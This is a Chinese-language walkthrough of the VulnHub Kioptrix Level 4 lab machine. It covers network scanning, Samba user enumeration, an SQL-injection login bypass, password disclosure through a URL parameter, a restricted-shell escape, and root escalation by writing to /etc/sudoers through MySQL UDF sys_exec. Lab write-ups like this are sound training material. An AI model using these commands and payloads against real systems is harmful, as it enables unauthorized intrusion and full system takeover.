0x00 目标资料 36
链接
https://www.vulnhub.com/entry/kioptrix-level-13-4,25/
难度推荐 4
- 思路 1
- 端口 0.5
- web——usershell 1
- usershell——rootshell 1.5
环境搭建
- VMware
下载下来之后是一个vmdx的文件,所以要经过处理
这里新建一个虚拟机,选择其他
移除原来的硬盘
加载下载好的硬盘
然后开机即可,这里需要注意的是,内存分配也要进行修改
0x01 信息收集
ip
masscan 192.168.25.1/24 --ping --rate 1000000000000000000000000000000
端口
nmap -A 192.168.25.213
0x02 samba
目标开启了1349和445,samba可以通过enum4linux进行扫描一下
enum4linux -a -o 目标
这里看到有以下用户
loneferret
robert
john
0x03 web——usershell
这里访问一下目标的站点,可以看到的是一个登录框
登录框一般猜解弱口令猜解,或者测试是否存在注入
这里先测试一下万能密码,可以看到进入到下图页面
admin
' or '1'='1
这里看到返回一个url
http://192.168.25.213/member.php?username=admin
这里对url里的username进行修改,修改为john时,可以看到显示了一个密码(测试发现,不论是robert还是john都会返回如下结果)
Username : john
Password : MyNameIsJohn
这里使用获取到的账号密码进行ssh连接
这里连接之后发现问题,很多命令都无法进行执行
使用如下命令获取tty
echo os.system('/bin/bash')
0x04 usershell——rootshell
这里我们在/var/www/目录下的checklogin.php文件里发现了mysql的账号和密码
进行连接
mysql -u root -p
这里使用udf进行提权
select sys_exec('echo "john ALL=(ALL) NOPASSWD: ALL" >> /etc/sudoers');
拿到flag